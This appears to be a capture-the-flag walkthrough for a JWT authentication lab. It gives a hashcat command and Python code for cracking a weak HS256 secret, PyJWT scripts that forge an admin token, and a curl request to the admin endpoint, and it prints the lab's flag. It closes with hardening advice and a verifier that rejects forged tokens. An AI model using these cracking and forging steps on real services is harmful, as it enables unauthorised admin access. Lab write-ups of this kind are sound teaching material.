JWT Bypass - Complete Solution Walkthrough

Step 1: Understanding the Challenge

The challenge presents a JWT-based authentication system. You need to analyze the JWT tokens and find a way to forge an admin token to access the admin panel.

Step 2: Initial Reconnaissance

  1. Access the JWT authentication system (you'll be automatically redirected from port 80 to the application)
  2. Login with the provided demo credentials:
    • Username: user
    • Password: password123
  3. This will give you a valid JWT token to analyze

Step 3: JWT Token Analysis

  1. Once you receive the JWT token, analyze it using tools like:
    • jwt.io - For decoding and analyzing JWT structure
    • hashcat - For cracking weak JWT secrets
    • john the ripper - Alternative for JWT secret cracking
  2. Examine the JWT structure: header.payload.signature

Step 4: Identifying the Vulnerability

  1. The JWT is signed with HS256 using a weak, guessable secret, so the signature can be attacked offline: anyone who recovers the secret can mint tokens the server will accept
  2. Use hashcat in JWT mode (-m 16500) to crack the secret against a wordlist (the token can be passed directly or saved to a file; a wordlist attack only applies to HMAC-signed tokens, so check that the header says HS256 first):
hashcat -a 0 -m 16500 <jwt_token> wordlist.txt
  3. John the Ripper works as an alternative for the same dictionary attack
  4. The secret is: secret123
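The decoding and dictionary attack above, as an added example written for this walkthrough (not the lab's code), using only the Python standard library so the mechanics hashcat hides are visible. The token and the six-word wordlist are constructed here: the token is signed with secret123 so the attack succeeds offline; in the lab, paste the token returned by the login instead.

```python
#!/usr/bin/env python3
"""Decode a JWT and dictionary-attack its HS256 secret with the standard library only."""
import base64
import hashlib
import hmac
import json


def b64url_decode(segment: str) -> bytes:
    """Base64url decode, re-adding the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt(token: str) -> dict:
    """Split header.payload.signature and parse the two JSON parts (no verification)."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "payload": json.loads(b64url_decode(payload_b64)),
        "signature": b64url_decode(signature_b64),
    }


def hs256_sign(header_b64: str, payload_b64: str, secret: bytes) -> bytes:
    """HS256 signature = HMAC-SHA256(secret, base64url(header) + '.' + base64url(payload))."""
    signing_input = f"{header_b64}.{payload_b64}".encode()
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def crack_hs256_secret(token: str, wordlist):
    """Return the first candidate secret that reproduces the token's signature, else None.

    This is the same test `hashcat -m 16500` runs, just without the GPU speed.
    """
    header_b64, payload_b64, signature_b64 = token.split(".")
    if decode_jwt(token)["header"].get("alg") != "HS256":
        raise ValueError("not an HS256 token; a wordlist attack only applies to HMAC-signed tokens")
    target = b64url_decode(signature_b64)
    for candidate in wordlist:
        candidate = candidate.strip()
        if hmac.compare_digest(hs256_sign(header_b64, payload_b64, candidate.encode()), target):
            return candidate
    return None


def make_hs256_token(payload: dict, secret: str) -> str:
    """Build an HS256 token; used here only to construct the sample input."""
    header_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hs256_sign(header_b64, payload_b64, secret.encode())
    return f"{header_b64}.{payload_b64}.{b64url_encode(sig)}"


# Constructed sample: the kind of token the lab's login hands the demo user (assumed claims).
SAMPLE_TOKEN = make_hs256_token({"username": "user", "role": "user", "exp": 1900000000}, "secret123")

# Constructed mini wordlist; against a real target use rockyou.txt or a JWT-secrets list.
SAMPLE_WORDLIST = ["password", "123456", "jwt_secret", "secret", "secret123", "admin"]

if __name__ == "__main__":
    parts = decode_jwt(SAMPLE_TOKEN)
    print("header :", parts["header"])
    print("payload:", parts["payload"])
    print("secret :", crack_hs256_secret(SAMPLE_TOKEN, SAMPLE_WORDLIST))
```

The alg check matters in practice: if the header says RS256 there is no HMAC secret to recover, and the attack to try is a different one; the wordlist loop here compares with hmac.compare_digest only to mirror what a correct verifier does, not because timing matters to an attacker cracking offline.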

Step 5: Forging an Admin Token

  1. Once you have the secret, forge a new JWT token with admin privileges
  2. Using Python to create the admin token:
#!/usr/bin/env python3
# Forge an admin token with the recovered secret. Requires the PyJWT package
# (pip install PyJWT): the unrelated "jwt" package on PyPI also imports as jwt
# and has no encode(), which is the usual cause of an AttributeError here.
import datetime
import jwt

# Claims the admin panel checks; exp keeps the forged token valid for 24 hours.
payload = {
    'username': 'admin',
    'role': 'admin',
    'exp': datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(hours=24),
}

# The weak secret recovered in Step 4; the server accepts anything signed with it.
secret = 'secret123'
admin_token = jwt.encode(payload, secret, algorithm='HS256')
# PyJWT 2.x returns a str, 1.x returned bytes; normalise so the print is usable.
if isinstance(admin_token, bytes):
    admin_token = admin_token.decode()
print(admin_token)
  3. If you get an AttributeError, ensure you have the correct library:
pip install PyJWT
  4. Alternative approach using a one-liner in a working Python environment:
python3 -c "import jwt, datetime; print(jwt.encode({'username': 'admin', 'role': 'admin', 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=24)}, 'secret123', algorithm='HS256'))"
  5. Alternatively, paste the secret into jwt.io, edit the payload to role admin, and copy the re-signed token

Step 6: Accessing the Admin Panel

  1. Use the forged admin token to access the admin endpoint:
curl -H "Authorization: Bearer <admin_token>" <target-ip>:8080/admin
  2. The admin endpoint will return the flag in JSON format

Step 7: Retrieving the Flag

  1. The admin endpoint response contains the flag:
538955b8-96c1-4905-a305-8cc385de622c

Security Implications and Prevention

  • Weak Secrets: Never use predictable or dictionary-based secrets for JWT signing; an HMAC key should be at least 32 random bytes from a CSPRNG, since anything in a wordlist falls to the offline attack shown above
  • Secret Management: Keep the key in a secret store rather than in source, and rotate it (with a short overlap window) so a leaked key has limited lifetime
  • Algorithm Verification: Pin the accepted algorithm on the server and reject any token whose header alg differs, including none; never let the token tell the verifier how to verify it
  • Server-side Validation: Check the signature in constant time, enforce exp (and nbf/iat where used), and reject tokens with missing claims instead of defaulting them
  • Consider RS256: Use asymmetric signing in production so the verifying service holds only a public key and there is no shared secret to crack or leak
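The server-side checks in the list above, as an added example written for this walkthrough (not the lab's code): a verifier that pins HS256, compares the signature in constant time, enforces exp, and uses a key from secrets rather than a word. The demo() function exercises it against a legitimate token and three forgeries (alg none, a token signed with secret123, and an expired token); all tokens, claims and the fixed clock value are constructed here for demonstration.

```python
#!/usr/bin/env python3
"""Hardened HS256 verification with the standard library; contrast with a verifier that
dispatches on header['alg'], which is what lets clients downgrade to 'none'."""
import base64
import hashlib
import hmac
import json
import secrets
import time


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def encode_token(header: dict, payload: dict, key: bytes) -> str:
    """Issue a token. With alg 'none' the signature segment is left empty, attacker-style."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = b"" if header.get("alg") == "none" else hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


class InvalidToken(Exception):
    pass


def verify_hs256(token: str, key: bytes, now=None) -> dict:
    """Return the payload only if the token is a valid, unexpired HS256 token under `key`."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        payload = json.loads(b64url_decode(p))
    except ValueError as exc:  # covers bad split, bad base64 and bad JSON
        raise InvalidToken(f"malformed token: {exc}") from exc

    # 1. Pin the algorithm: the server decides, the header is only checked for agreement.
    if header.get("alg") != "HS256":
        raise InvalidToken(f"unexpected alg {header.get('alg')!r}")

    # 2. Constant-time comparison over exactly the bytes that were signed.
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise InvalidToken("bad signature")

    # 3. Require exp and reject anything already expired; no exp means no acceptance.
    now = time.time() if now is None else now
    if not isinstance(payload.get("exp"), (int, float)) or payload["exp"] <= now:
        raise InvalidToken("token expired or has no exp")
    return payload


# A key no wordlist contains: 32 CSPRNG bytes (in production, loaded from a secret store).
SERVER_KEY = secrets.token_bytes(32)


def demo(key: bytes = SERVER_KEY) -> dict:
    """Run the verifier over one legitimate token and three forgeries; return outcomes by name."""
    fixed_now = 1_700_000_000  # constructed clock so results are deterministic
    user = {"username": "user", "role": "user", "exp": fixed_now + 3600}
    admin = {"username": "admin", "role": "admin", "exp": fixed_now + 3600}
    results = {}
    legit = encode_token({"alg": "HS256", "typ": "JWT"}, user, key)
    results["legit"] = verify_hs256(legit, key, fixed_now)["role"]
    forgeries = {
        "alg_none": encode_token({"alg": "none", "typ": "JWT"}, admin, key),
        "weak_secret": encode_token({"alg": "HS256", "typ": "JWT"}, admin, b"secret123"),
        "expired": encode_token({"alg": "HS256", "typ": "JWT"}, {**admin, "exp": fixed_now - 1}, key),
    }
    for name, token in forgeries.items():
        try:
            verify_hs256(token, key, fixed_now)
            results[name] = "accepted"
        except InvalidToken as exc:
            results[name] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:12s} {outcome}")
```

With PyJWT the same posture is jwt.decode(token, key, algorithms=["HS256"]): the algorithms list is the pin, and omitting it is the mistake that turns "verify the algorithm" into "trust the header".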